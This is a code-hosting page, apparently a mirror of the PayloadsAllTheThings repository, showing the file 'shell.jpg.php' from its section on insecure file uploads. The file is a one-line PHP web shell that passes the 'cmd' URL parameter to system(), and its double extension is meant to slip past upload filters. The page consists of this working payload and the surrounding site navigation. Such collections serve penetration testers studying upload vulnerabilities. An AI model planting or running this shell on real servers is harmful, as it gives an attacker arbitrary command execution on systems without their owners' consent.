This website requires JavaScript.
Explore
Help
Register
Sign In
wanderer
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2025-08-27 03:41:40 +02:00
Code
Issues
Releases
Activity
2.0
PayloadsAllTheThings
/
Upload insecure files
/
PHP Extension
/
shell.jpg.php
Swissky
3522d9a674
Files JPEG -> JPG + Tag v2
2018-11-17 14:40:12 +01:00
1 line
43 B
PHP
Raw
Permalink
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
View Git Blame
Copy Permalink